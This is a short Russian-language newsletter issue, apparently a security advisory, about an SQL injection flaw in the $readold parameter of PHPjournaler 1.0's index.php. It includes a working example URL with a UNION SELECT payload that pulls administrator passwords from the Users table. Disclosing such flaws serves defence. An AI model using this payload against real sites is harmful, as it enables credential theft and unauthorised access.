Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PHPjournaler.


Компьютер для продвинутых пользователей
Содержание:
PHPjournaler
ПО: PHPjournaler
Версия: 1.0

Описание:
Уязвимость скрипт:
index.php
Уязвимость находится в $readold и позволяет выполнить SQL-инъекцию для получения пароля администратора.
Пример:
http://host/phpjournaler/index.php?readold=999%20union%20select%201,password,3,4,name,6%20from%20Users/*
PHPjournaler
Рассылка создана и ведется при поддержке Информационной сети Пермского края.

В избранное